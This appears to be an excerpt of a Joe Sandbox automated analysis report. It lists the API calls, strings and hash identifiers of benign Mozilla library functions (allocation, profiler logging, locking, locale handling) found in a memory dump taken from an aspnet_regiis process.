                                                                                                                                                                    • API String ID: 4275171209-2186867486
                                                                                                                                                                    • Opcode ID: ab81a1c8ba253959546d7294857d48dfdef450c4419de86cad0d8596662ee24c
                                                                                                                                                                    • Instruction ID: f4adcf3290d588cc5a7ed6af92f837f182db086d5ac74fd77b58d92f36e97348
                                                                                                                                                                    • Opcode Fuzzy Hash: ab81a1c8ba253959546d7294857d48dfdef450c4419de86cad0d8596662ee24c
                                                                                                                                                                    • Instruction Fuzzy Hash: 7131C5717442075FFB20AFA58E46B6E7BB9AB46719F204425F615ABF80DB70D400C7A2
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C79F100: LoadLibraryW.KERNEL32(shell32,?,6C80D020), ref: 6C79F122
                                                                                                                                                                      • Part of subcall function 6C79F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C79F132
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C79ED50
                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C79EDAC
                                                                                                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C79EDCC
                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C79EE08
                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C79EE27
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C79EE32
                                                                                                                                                                      • Part of subcall function 6C79EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C79EBB5
                                                                                                                                                                      • Part of subcall function 6C79EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C7CD7F3), ref: 6C79EBC3
                                                                                                                                                                      • Part of subcall function 6C79EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C7CD7F3), ref: 6C79EBD6
                                                                                                                                                                    Strings
                                                                                                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C79EDC1
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                    • API String ID: 1980384892-344433685
                                                                                                                                                                    • Opcode ID: d6e7f2c5a1aeab7e0f7ed30072f12fe9a76d14928cbfabf65d7f36aefc8de929
                                                                                                                                                                    • Instruction ID: 50c31f3393f362f786a012bcf253bd3a2a7a0899403b7b3d8c6e1898bc50e407
                                                                                                                                                                    • Opcode Fuzzy Hash: d6e7f2c5a1aeab7e0f7ed30072f12fe9a76d14928cbfabf65d7f36aefc8de929
                                                                                                                                                                    • Instruction Fuzzy Hash: 3C51D471D052088BEB10DF68EA497EEB7B4BF55318F04852DE85567740E7316948C7E2
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C80A565
                                                                                                                                                                      • Part of subcall function 6C80A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C80A4BE
                                                                                                                                                                      • Part of subcall function 6C80A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C80A4D6
                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C80A65B
                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C80A6B6
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                                    • String ID: 0$z
                                                                                                                                                                    • API String ID: 310210123-2584888582
                                                                                                                                                                    • Opcode ID: 26be795e0c22d0b95412beb9658b0cb5452fab12818ce3634a4023984d81b405
                                                                                                                                                                    • Instruction ID: a832407c6d264255c25194fd896d6199c0d87534bd9b78d8708d78ca67d07413
                                                                                                                                                                    • Opcode Fuzzy Hash: 26be795e0c22d0b95412beb9658b0cb5452fab12818ce3634a4023984d81b405
                                                                                                                                                                    • Instruction Fuzzy Hash: 11411871A097459FC351DF28C580A8BBBF5BF89354F408A2EF4A987650E730D949CB93
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
                                                                                                                                                                      • Part of subcall function 6C7CAB89: LeaveCriticalSection.KERNEL32(6C81E370,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284,?,?,6C7B56F6), ref: 6C7CABD1
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    Strings
                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C7D946B
                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C7D947D
                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C7D9459
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                    • API String ID: 4042361484-1628757462
                                                                                                                                                                    • Opcode ID: 2e4d08df97d1fe432e9e4d8592595147e4980982228e07f55db41d4c5dcf7386
                                                                                                                                                                    • Instruction ID: 9fa738fdf514ce1ca97ca7e4b0b52bc608cd17f691886878a9b60e6bc17fad7b
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e4d08df97d1fe432e9e4d8592595147e4980982228e07f55db41d4c5dcf7386
                                                                                                                                                                    • Instruction Fuzzy Hash: CD01D870A041038FE720DB9DEB26A4733F59B2632EF054937E91E87F42DA21E554C997
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E0F6B
                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7E0F88
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E0FF7
                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7E1067
                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C7E10A7
                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C7E114B
                                                                                                                                                                      • Part of subcall function 6C7D8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7F1563), ref: 6C7D8BD5
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7E1174
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7E1186
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2803333873-0
                                                                                                                                                                    • Opcode ID: 94a04d84b6a6065443662ad5429d8c38d048e5e7fcfd39ba557628c7531f70a7
                                                                                                                                                                    • Instruction ID: 5f5c1d42a55771a2d7e5d26095c48e84803e153f2430652d7825397123f13a50
                                                                                                                                                                    • Opcode Fuzzy Hash: 94a04d84b6a6065443662ad5429d8c38d048e5e7fcfd39ba557628c7531f70a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E6105766043459FDB10CF25DA8879AB7F5BFC9308F04892DE88947712EB31E949CB82
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B6AC
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B6D1
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B6E3
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B70B
                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B71D
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C79B61E), ref: 6C79B73F
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B760
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C79B61E,?,?,?,?,?,00000000), ref: 6C79B79A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1394714614-0
                                                                                                                                                                    • Opcode ID: 59e101a9ffa8307d751b3cedb255ed2dc4d7f790114b1e1101f1b1017ded62ac
                                                                                                                                                                    • Instruction ID: 0c7d1fce1122575980100adfb6d0c832127bf9a661a873d6660bec771f75c99f
                                                                                                                                                                    • Opcode Fuzzy Hash: 59e101a9ffa8307d751b3cedb255ed2dc4d7f790114b1e1101f1b1017ded62ac
                                                                                                                                                                    • Instruction Fuzzy Hash: 0841D4B2D001159FCB20DF78ED846AEB7B5BB54324F25072AE825E7781E731B90487E1
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(6C815104), ref: 6C79EFAC
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C79EFD7
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C79EFEC
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C79F00C
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C79F02E
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6C79F041
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C79F065
                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C79F072
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1148890222-0
                                                                                                                                                                    • Opcode ID: 2fbf4a4a7791a98afe7afa57a611f19c04866ae22ec1f8c851669779eddca2d3
                                                                                                                                                                    • Instruction ID: f1462cc5b4a25358094723fb45f521a78fee5ac13003a60a17fe647ce3517b1b
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fbf4a4a7791a98afe7afa57a611f19c04866ae22ec1f8c851669779eddca2d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 9941D5B1A002059FCB18CF68ED849AE7769BF84324B24063DE816DB795EB31E915C7E1
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C80B5B9
                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C80B5C5
                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C80B5DA
                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C80B5F4
                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C80B605
                                                                                                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C80B61F
                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C80B631
                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C80B655
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1276798925-0
                                                                                                                                                                    • Opcode ID: fe325d99693a9033aa77e45b7b39b3259564bb5059323c181f6c63cbdd3fb70e
                                                                                                                                                                    • Instruction ID: 6b5306441298d96cfe58772241a9efed4acb7f723c5b9b76e59c79752b6ae632
                                                                                                                                                                    • Opcode Fuzzy Hash: fe325d99693a9033aa77e45b7b39b3259564bb5059323c181f6c63cbdd3fb70e
                                                                                                                                                                    • Instruction Fuzzy Hash: C531C3B1B001068FCB20DF69C9599BEB7F5EF8532AF100965D50297B40CB30A806CBD1
                                                                                                                                                                    APIs
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C79EB57,?,?,?,?,?,?,?,?,?), ref: 6C7CD652
                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C79EB57,?), ref: 6C7CD660
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C79EB57,?), ref: 6C7CD673
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7CD888
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                    • String ID: Wyl$|Enabled
                                                                                                                                                                    • API String ID: 4142949111-2569927531
                                                                                                                                                                    • Opcode ID: bb87696494be5b4b958b0fef589f6f5da971147031b1eb7dc82b1d57d50b8916
                                                                                                                                                                    • Instruction ID: 884f0327ef841d306b1ac610595cf72d674eb1d568a52e97b87c41e024f6ed91
                                                                                                                                                                    • Opcode Fuzzy Hash: bb87696494be5b4b958b0fef589f6f5da971147031b1eb7dc82b1d57d50b8916
                                                                                                                                                                    • Instruction Fuzzy Hash: A9A127B0B0430A8FDB11CF69C5C47AEBBF1AF59318F14806CD8996BB41D731A845CBA6
                                                                                                                                                                    APIs
                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C7F7ABE), ref: 6C7A985B
                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C7F7ABE), ref: 6C7A98A8
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6C7A9909
                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C7A9918
                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C7A9975
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                     • Associated: 00000003.00000002.3402710092.000000006C790000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402949769.000000006C81E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                     • Associated: 00000003.00000002.3402999327.000000006C822000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1281542009-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE,?,?,6C7DDC2C), ref: 6C7AB7E6
                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE,?,?,6C7DDC2C), ref: 6C7AB80C
                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE), ref: 6C7AB88E
                                                                                                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C7ECC83,?,?,?,?,?,?,?,?,?,6C7EBCAE,?,?,6C7DDC2C), ref: 6C7AB896
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 922945588-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E1D0F
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6C7E1BE3,?,?,6C7E1D96,00000000), ref: 6C7E1D18
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6C7E1BE3,?,?,6C7E1D96,00000000), ref: 6C7E1D4C
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7E1DB7
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C7E1DC0
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C7E1DDA
                                                                                                                                                                      • Part of subcall function 6C7E1EF0: GetCurrentThreadId.KERNEL32 ref: 6C7E1F03
                                                                                                                                                                      • Part of subcall function 6C7E1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C7E1DF2,00000000,00000000), ref: 6C7E1F0C
                                                                                                                                                                      • Part of subcall function 6C7E1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C7E1F20
                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C7E1DF4
                                                                                                                                                                      • Part of subcall function 6C7ACA10: malloc.MOZGLUE(?), ref: 6C7ACA26
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1880959753-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D84F3
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D850A
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D851E
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D855B
                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D856F
                                                                                                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D85AC
                                                                                                                                                                      • Part of subcall function 6C7D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D767F
                                                                                                                                                                      • Part of subcall function 6C7D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D7693
                                                                                                                                                                      • Part of subcall function 6C7D7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7D85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D76A7
                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7D85B2
                                                                                                                                                                      • Part of subcall function 6C7B5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7B5EDB
                                                                                                                                                                      • Part of subcall function 6C7B5E90: memset.VCRUNTIME140(6C7F7765,000000E5,55CCCCCC), ref: 6C7B5F27
                                                                                                                                                                      • Part of subcall function 6C7B5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7B5FB2
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2666944752-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C7A1699
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16CB
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16D7
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16DE
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16E5
                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C7A16EC
                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C7A16F9
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 375572348-0
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: GetCurrentProcess.KERNEL32(?,6C7931A7), ref: 6C7CCBF1
                                                                                                                                                                      • Part of subcall function 6C7CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7931A7), ref: 6C7CCBFA
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7A4A68), ref: 6C7D945E
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7D9470
                                                                                                                                                                      • Part of subcall function 6C7D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7D9482
                                                                                                                                                                      • Part of subcall function 6C7D9420: __Init_thread_footer.LIBCMT ref: 6C7D949F
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF619
                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C7DF598), ref: 6C7DF621
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7D94EE
                                                                                                                                                                      • Part of subcall function 6C7D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C7D9508
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7DF637
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF645
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C81F4B8,?,?,00000000,?,6C7DF598), ref: 6C7DF663
                                                                                                                                                                    Strings
                                                                                                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C7DF62A
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6C7CAB89: EnterCriticalSection.KERNEL32(6C81E370,?,?,?,6C7934DE,6C81F6CC,?,?,?,?,?,?,?,6C793284), ref: 6C7CAB94
